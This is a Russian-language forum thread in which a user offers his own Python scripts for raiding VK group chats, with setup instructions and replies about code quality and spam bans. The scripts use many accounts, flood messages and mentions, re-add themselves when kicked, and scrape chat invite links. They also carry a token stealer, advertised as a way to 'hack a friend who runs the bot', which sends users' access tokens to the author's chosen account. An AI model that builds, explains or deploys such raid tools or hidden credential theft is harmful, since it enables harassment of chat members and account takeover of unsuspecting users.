Уничтожитель бесед ВК. Антикик vk.com

Natrix5369

Новичок
Статус
offline
Регистрация
03.03.2019
Сообщения
7
Репутация
3
Доброго дня.
Выкладываю сорсы собственного написания скрипты python3, что позволяет разнести беседу в пух и прах, т.к. самому надоело уже заниматься, а так может кому нибудь пригодится ну и от +'сиков не откажусь.
Сразу говорю, что программирование только осваиваю.
Так же на форуме пишу впервые(до этого нигде не создавал подобные топики). Если требуется более корректного оформление - прошу отписаться.
Реализовано:
-мультиаккаунты
-антики из беседы
-дикий флуд + смена имени чата
-не нужно вводить ИД беседы. Достаточно её имя.
-стиллер токенов (можете похекать дружка, который запустил бота)

Баги:
-Иногда не хочет адекватно запускаться скрипт, если твои боты уже в беседе.
-Частенько вылетает Flood Control от ВК (частично пофикшено изменением алгоритмом работы антикика)
-Еще что-то о чем забыл упомянуть

Инструкция:
-установить библиотеку vk_api
-установить pywin32
-скрипт balloontip.py служит для уведомлений под WIN системы. Должен лежать рядом с pizdarwanka_enc.py
-запустить скрипт pizdarwanka_enc.py. В каталоге, в месте запуска появятся файлы:
  • pizdarwanka_defender.txt
  • pizdarwanka_settings.txt
  • pizdarwanka_tokens.txt
В pizdarwanka_defender.txt:
Код:
Пишем ИД которые требуется добавлять, если кикнули из беседы

В pizdarwanka_tokens.txt:
Код:
Password - Пишется кодированный скриптом "base64encode.py" + 3 рандомных символа токен пользователя, куда требуется отправить стиллером сообщения (если не включать стиллер, то может быть рандомное, все равно работать будет)
Пример:
Токен принимающего данные:
b4fcf9f42ed2c3b2163835ab826844146c7fe73356f1be847c4aa454fd7e1b5b169f7389ecb5ef9be4f1b
Токен, что будем кодировать:
b4fcf9f42ed2c3b2163835ab826844146c7fe73356f1be847c4aa454fd7e1b5b169f7389ecb5ef9be4f1b123
На выходе получаем:
YjRmY2Y5ZjQyZWQyYzNiMjE2MzgzNWFiODI2ODQ0MTQ2YzdmZTczMzU2ZjFiZTg0N2M0YWE0NTRmZDdlMWI1YjE2OWY3Mzg5ZWNiNWVmOWJlNGYxYjEyMw==
Это и вставляем в пароль

My_Token - Токен вашего основного аккаунта(который первый залетает в беседу и добавляет уже всех остальных)

дальше на каждой строке пишем токены аккаунтов

-Первый запуск осуществляется с аргументом "f" (python pizdarwanka_enc.py f)
Скрипт добавит "токены в друзья" + отправит инвайт в друзья каждым токеном на ID'шники, что в pizdarwanka_defender.txt

-Скрипт pi_group.py позволяет спамить чат-ботами заранее созданными.
Активация:
Код:
активировать скрипт.
Добавить чат-ботов в беседу
В чате выбрать всех ботов через @ и отправить какой нибудь символ. Бот будет брать сообщения из text.txt, что лежит рядом с скриптом
Настройки для чат-ботов:
  • Long Poll API: - включен
  • Версия API: 5.92
  • Разрешать добавлять сообщество в беседы - включено

Общие вопросы:
-Как включить стиллер?
  • стиллер включается в pizdarwanka_enc.py, на строке 271 путем расскоменчивания строки. и в строке 601 вставить ID куда отправить все токены из файла токенов.
-Что делать с украденными токенами? Как зайти на страницу?
  • Пока желания нет сливать способ, т.к. ВК официально запретил использовать access_token для входа на страницу вк. Думаю, если душевно примите на форуме - расскажу
-Зачем нужен text.txt ?
  • В нем хранится текст для флуда чат-ботами. В приложенном файле 7321 эмодзи
-Будешь исправлять баги, расширять функционал?
  • В планах этого нет. Однако если больше количество людей попросить - сделаю.
-Как бороться с чат-менеджерами?
  • Однозначного решения пока нет. Думаю поможет 20+ аккаунтов в боте(токенов)
-Как отвечать на вопросы в скрипте?
  • REMOVE LAST SETTINGS? (y) (д) ( y(eng),д(рус), пустая строка - не удалять)
  • Код:
    в pizdarwanka_settings.txt сохраняется ответ на вопрос: "CANCEL 'MAMU EBAL'?" и имя беседы
  • CANCEL 'MAMU EBAL'? (y) (д): ( y(eng),д(рус), пустая строка - включить)
  • Код:
    После добавления всех токенов в беседу, токены выбирают всех из конфы исключая пользователей в pizdarwanka_defender.txt и шлют им уведомления. Эффект бомбезный.
  • CUSTOM MESSAGE (y) (д): ( y(eng),д(рус), пустая строка - выключить)
  • Код:
    составление своего списка флуд-сообщений
  • RUN MODULE 'run_automessage'? (y) (д): ( y(eng),д(рус), пустая строка - выключить)
  • Код:
    флуд каждые 10 сек.
  • RUN MODULE 'run_switch_chat_name'? (y) (д): ( y(eng),д(рус), пустая строка - выключить)
  • Код:
    смена имени чата каждые 10 сек (текст меняется на строке 251)
-Зачем скрипт parser_link_chats.py?
  • Скрипт для парсинга комментов в группах под постами на предмет пригласительных в чат. Запускать: python parser_link_chats.py <имя_группы> <количество_постов_на_чек>
Код:
python parser_link_chats.py 4ch 1000
в месте запуска скрипта появится файл links.txt в нем будет результат.


Вопросы можно писать сюда:
https://vk.com/id51606403

Так же прикладываю видос демонстрации работы:
https://vk.com/video51606403_456240048


Токен получить можно тут:


Код:
https://oauth.vk.com/authorize?client_id=2685278&redirect_uri=https://oauth.vk.com/blank.html&display=page&scope=notify%2Cfriends%2Cphotos%2Caudio%2Cvideo%2Cpages%2Cstatus%2Cnotes%2Cmessages%2Cwall%2Cads%2Coffline%2Cdocs%2Cgroups%2Cnotifications%2Cstats%2Cemail%2Cmarket&response_type=token&v=5.64&revoke=1
 

Вложения

  • pizdorwanka.zip
    9.7 KB · Просмотры: 142
  • text.txt
    62.5 KB · Просмотры: 111
Последнее редактирование:

Kaneku

Новичок
Статус
offline
Регистрация
26.02.2019
Сообщения
3
Репутация
3
Нужны левые акки вк, да?
 

MrSmitix

Новичок
Статус
offline
Регистрация
18.01.2018
Сообщения
25
Репутация
3
Удали и больше никому не показывай.

Я думал что меня уже ничем не испугать. Но ты смог.
print ('FOUND POST:' + str(getid['id'])) и offset = str(c) + "0" + "0"
дальше я даже смотреть не стал. Советую отрефракторить, а лучше с 0 переписать используя нормальные имена функций, файлов и переменных. А так же придерживаясь PEP8. Танцы с бубнами на счёт токена не имеют смысла. И кстати, юзай format или f строки для вывода.
 
Последнее редактирование:

Natrix5369

Новичок
Статус
offline
Регистрация
03.03.2019
Сообщения
7
Репутация
3
Удали и больше никому не показывай.

Я думал что меня уже ничем не испугать. Но ты смог.
print ('FOUND POST:' + str(getid['id'])) и offset = str(c) + "0" + "0"
дальше я даже смотреть не стал. Советую отрефракторить, а лучше с 0 переписать используя нормальные имена функций, файлов и переменных. А так же придерживаясь PEP8. Танцы с бубнами на счёт токена не имеют смысла. И кстати, юзай format или f строки для вывода.
Спасибо за конструктивную критику. А что не устраивает в названиях функций и переменных? Как нужно? Что касается format: неужели так важно писать не print ( str + var) , а print ( str.format) ?
 

uglyboy322

Местный
Статус
offline
Регистрация
13.01.2017
Сообщения
197
Репутация
74
Для личной практики ты молодец что сделал. Сразу скажу, код не смотрел, только видос. Смысловой нагрузки данный "бот" не несет, но ради фана поиграться можно. Сразу скажу кто будет юзать: свои акки не трогайте, будете получать заморозки за флуд с упоминаниями (сначало перекинет на капчу, после 3-х игнорирований\неверных решений капчи получите фриз)
 

Natrix5369

Новичок
Статус
offline
Регистрация
03.03.2019
Сообщения
7
Репутация
3
Для личной практики ты молодец что сделал. Сразу скажу, код не смотрел, только видос. Смысловой нагрузки данный "бот" не несет, но ради фана поиграться можно. Сразу скажу кто будет юзать: свои акки не трогайте, будете получать заморозки за флуд с упоминаниями (сначало перекинет на капчу, после 3-х игнорирований\неверных решений капчи получите фриз)
Флуд вырубить можно,через "вопросы". И использовать для флуда чат-бота и скрипт под него. Конкретно пиздорванка разработана на антикик а за это не получаешь фриз
 

uglyboy322

Местный
Статус
offline
Регистрация
13.01.2017
Сообщения
197
Репутация
74
Флуд вырубить можно,через "вопросы". И использовать для флуда чат-бота и скрипт под него. Конкретно пиздорванка разработана на антикик а за это не получаешь фриз
сообществу так же могут обрезать сообщения (держу бота который голосовые в текст переводит, накосячил в коде и он ушел в цикл и начал спамить переводом за что мне заблочили на группе сообщения с пометкой "спам", но через ТП договорился и мне восстановили)
 

Natrix5369

Новичок
Статус
offline
Регистрация
03.03.2019
Сообщения
7
Репутация
3
сообществу так же могут обрезать сообщения (держу бота который голосовые в текст переводит, накосячил в коде и он ушел в цикл и начал спамить переводом за что мне заблочили на группе сообщения с пометкой "спам", но через ТП договорился и мне восстановили)
Ну может. Сам не сталкивался с такими. Флудило всегда исправно)
 

uglyboy322

Местный
Статус
offline
Регистрация
13.01.2017
Сообщения
197
Репутация
74
Ну может. Сам не сталкивался с такими. Флудило всегда исправно)
ну у меня по факту 3 таких флуда было :D 2 просто остановил (пофиксил), а вот на третий дали блок (мб кто жалобу кинул т.к. уже на проде заметил баг, а юзало бота уже человек 200)
 

Natrix5369

Новичок
Статус
offline
Регистрация
03.03.2019
Сообщения
7
Репутация
3
ну у меня по факту 3 таких флуда было :D 2 просто остановил (пофиксил), а вот на третий дали блок (мб кто жалобу кинул т.к. уже на проде заметил баг, а юзало бота уже человек 200)
Думаю ещё сыграло роль,что мои боты - частные группы и на них вроде нельзя кинуть жалобу
 

uglyboy322

Местный
Статус
offline
Регистрация
13.01.2017
Сообщения
197
Репутация
74

MrSmitix

Новичок
Статус
offline
Регистрация
18.01.2018
Сообщения
25
Репутация
3
Спасибо за конструктивную критику. А что не устраивает в названиях функций и переменных? Как нужно? Что касается format: неужели так важно писать не print ( str + var) , а print ( str.format) ?
Читабельность, PEP. Питон сам по себе очень легкий язык. В том плане что сами программы читаются и понимаются спокойно. Но у тебя эта концепция убита на корню. По этому лучше посмотри примеры каких нибудь популярных модулей на Python, там как правило всё по канону.
Если ты сливаешь куда-то код, вот например как сейчас. И кто-то захочет его изучить, мб доработать он... не выйдет у него ничего.
 

RawBerry

Местный
Статус
offline
Регистрация
08.09.2018
Сообщения
50
Репутация
57
very good по-моему для развлекаловки, помог настроить, +rep как говорится выдал бы плюс